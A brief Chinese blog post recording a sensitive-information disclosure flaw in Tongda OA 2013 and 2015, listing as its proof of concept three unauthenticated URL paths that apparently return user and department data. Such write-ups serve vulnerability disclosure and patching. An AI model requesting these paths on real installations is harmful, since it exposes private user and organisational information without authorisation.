通达OA 页面敏感信息-2013/2015版本

参考

http://wiki.0-sec.org/0day/%E9%80%9A%E8%BE%BEoa/4.html

漏洞影响

2013、2015版本

复现过程

POC:

http://0-sec.org/general/get_userinfo.php

http://0-sec.org/general/ipanel/user/query.php

http://0-sec.org/general/info/dept/

 

 

 

 

posted @ 2020-04-24 17:29  Null1433  阅读(772)  评论(0编辑  收藏  举报